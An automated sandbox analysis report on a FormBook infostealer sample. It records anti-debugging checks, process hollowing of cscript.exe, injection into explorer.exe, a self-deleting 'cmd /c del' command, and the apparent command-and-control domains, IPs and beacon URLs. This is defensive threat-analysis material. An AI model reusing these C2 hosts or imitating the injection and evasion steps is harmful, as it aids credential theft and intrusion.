          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]6_2_0544513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]6_2_0541B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]6_2_0541B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]6_2_0541B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054A41E8 mov eax, dword ptr fs:[00000030h]6_2_054A41E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C182 mov eax, dword ptr fs:[00000030h]6_2_0543C182
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A185 mov eax, dword ptr fs:[00000030h]6_2_0544A185
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442990 mov eax, dword ptr fs:[00000030h]6_2_05442990
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]6_2_054461A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]6_2_054461A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054969A6 mov eax, dword ptr fs:[00000030h]6_2_054969A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]6_2_05430050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]6_2_05430050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1074 mov eax, dword ptr fs:[00000030h]6_2_054E1074
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D2073 mov eax, dword ptr fs:[00000030h]6_2_054D2073
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]6_2_054E4015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]6_2_054E4015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]6_2_05497016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]6_2_05497016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]6_2_05497016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov ecx, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]6_2_054140E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]6_2_054140E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]6_2_054140E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054158EC mov eax, dword ptr fs:[00000030h]6_2_054158EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419080 mov eax, dword ptr fs:[00000030h]6_2_05419080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]6_2_05493884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]6_2_05493884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00409B40 LdrLoadDll
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_10013A46 SetUnhandledExceptionFilter, UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.assisttm.com
          Source: C:\Windows\explorer.exe; Domain query: www.gsjbd1.club
          Source: C:\Windows\explorer.exe; Network Connect: 23.110.214.34 80
          Source: C:\Windows\explorer.exe; Network Connect: 45.8.125.8 80
          Source: C:\Windows\explorer.exe; Domain query: www.tyjgfuke.com
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe; Domain query: www.yr-golf.com
          Source: C:\Windows\explorer.exe; Domain query: www.fastbest.host

          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1300000

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Memory written: C:\Users\user\Desktop\Y1p8VPvyU2.exe base: 400000 value starts with: 4D5A

          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Thread APC queued: target process: C:\Windows\explorer.exe

          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Process created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.321987906.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.308514622.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.339334815.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.310601041.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Program Manager (Not Responding)
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.332640768.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314336905.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10010AED cpuid 0_2_10010AED
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_0040594D

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 2 | Input Capture 1 | Security Software Discovery 251 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          [Behavior graph. ID: 532909; Sample: Y1p8VPvyU2; Startdate: 02/12/2021; Architecture: WINDOWS; Score: 100. Process chain: Y1p8VPvyU2.exe (started) -> Y1p8VPvyU2.exe (started) -> explorer.exe (injected) -> cscript.exe (started) -> cmd.exe (started) -> conhost.exe (started). Files dropped by the first Y1p8VPvyU2.exe process: C:\Users\user\AppData\Local\...\msvofdls.dll (PE32) and C:\Users\user\AppData\Local\...\6jgsfkran1lw1 (DOS).]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Y1p8VPvyU2.exe | 35% | Virustotal |
          Y1p8VPvyU2.exe | 9% | Metadefender |
          Y1p8VPvyU2.exe | 64% | ReversingLabs | Win32.Trojan.Swotter

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll | 50% | ReversingLabs | Win32.Trojan.Pwsx

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.Y1p8VPvyU2.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.Y1p8VPvyU2.exe.2420000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.Y1p8VPvyU2.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          6.2.cscript.exe.592796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.1.Y1p8VPvyU2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.Y1p8VPvyU2.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.Y1p8VPvyU2.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.Y1p8VPvyU2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.Y1p8VPvyU2.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.Y1p8VPvyU2.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          6.2.cscript.exe.35c8670.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.0.Y1p8VPvyU2.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          yr-golf.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom | 0% | Avira URL Cloud | safe
          https://fastbest.host | 0% | Avira URL Cloud | safe
          http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh | 0% | Avira URL Cloud | safe
          www.tgalegail.quest/n6fr/ | 0% | Avira URL Cloud | safe
          http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB | 0% | Avira URL Cloud | safe
          http://www.tyjgfuke.com/$t | 0% | Avira URL Cloud | safe
          http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.tyjgfuke.com | 23.110.214.34 | true | true | | unknown
          assisttm.com | 34.102.136.180 | true | false | | unknown
          yr-golf.com | 34.102.136.180 | true | false | | unknown
          www.fastbest.host | 45.8.125.8 | true | true | | unknown
          www.caixadepandora.club | 137.184.111.224 | true | false | | unknown
          www.assisttm.com | unknown | unknown | true | | unknown
          www.gsjbd1.club | unknown | unknown | true | | unknown
          www.yr-golf.com | unknown | unknown | true | | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom | true | Avira URL Cloud: safe | unknown
                        http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh | false | Avira URL Cloud: safe | unknown
                        www.tgalegail.quest/n6fr/ | true | Avira URL Cloud: safe | low
                        http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://fastbest.host | cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://nsis.sf.net/NSIS_Error | Y1p8VPvyU2.exe | false | | high
                        http://nsis.sf.net/NSIS_ErrorError | Y1p8VPvyU2.exe | false | | high
                        https://browsehappy.com/ | cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | false | | high
                        http://www.tyjgfuke.com/$t | cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt | cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                        https://via.placeholder.com/100 | cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | false | | high

                                Contacted IPs

                                Public

                                IP | Domain | Country | ASN | ASN Name | Malicious
                                34.102.136.180 | assisttm.com | United States | 15169 | GOOGLEUS | false
                                23.110.214.34 | www.tyjgfuke.com | United States | 395954 | LEASEWEB-USA-LAX-11US | true
                                45.8.125.8 | www.fastbest.host | Russian Federation | 49505 | SELECTELRU | true

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:532909
                                Start date:02.12.2021
                                Start time:19:58:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Y1p8VPvyU2 (renamed file extension from none to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/2@7/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 21.8% (good quality ratio 19.7%)
                                • Quality average: 74.7%
                                • Quality standard deviation: 31.6%
                                HCA Information:
                                • Successful, ratio: 87%
                                • Number of executed functions: 103
                                • Number of non-executed functions: 91
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                Warnings:
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                Match | Associated Sample Name / URL | Detection | Context
                                www.fastbest.host | Medtronics Product catalog and prices_pdf.exe | malicious | 194.54.163.227

                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                Match | Associated Sample Name / URL | Detection
                                C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll | product list.xlsx | malicious
                                C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1 | product list.xlsx | malicious

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1
                                    Process:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    File Type:DOS executable (COM, 0x8C-variant)
                                    Category:dropped
                                    Size (bytes):217235
                                    Entropy (8bit):7.9937809161987765
                                    Encrypted:true
                                    SSDEEP:6144:W4FmTjet9fxOzh9Ky33TDMfVwr37hQnll6V:GE9YzhogvMfm3olI
                                    MD5:75ACE7B8440CE829D653343E18EAE33A
                                    SHA1:09F23DD8962701C4D5213E2A7AA395985E8963DE
                                    SHA-256:A4CAE10880D0DD180CC5B92E38F449EE244E83186725BD1257312DCC05AA4E48
                                    SHA-512:F4BC54E1396D9AF6E61ED270B068D60475F357BD3258ABF4E659D75FD81D27D173BBB2126D646BA51736B3EA82CEC03F5D4A1D9D8FEFC6E1599333827B7AB2A0
                                    Malicious:false
                                    Joe Sandbox View:
                                    • Filename: product list.xlsx, Detection: malicious, Browse
                                    Reputation:low
                                    C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll
                                    Process:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):137728
                                    Entropy (8bit):6.411397085063496
                                    Encrypted:false
                                    SSDEEP:1536:gmPsLrHeJTgGJPLlr0VOGfTRisu0/8UgCUoXD2/Y+z4o8QqbfvZ2BksWjcd8EmjN:sLz0gGJPprwr/dXDZE2Z2B8E8
                                    MD5:4881ED27473CD15B3FCC072F11465658
                                    SHA1:37A29E690965E233CA4B89538A77188DC2048BFF
                                    SHA-256:13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
                                    SHA-512:ED198137652861DB9A6595FEDC6E376EA2BC730E5D6BC8D58B203F07814200529597AD5B24EE8409942222CB18674DDE38422B82FFCD057E63ACC9233E6EAFF3
                                    Malicious:true
                                    Antivirus:
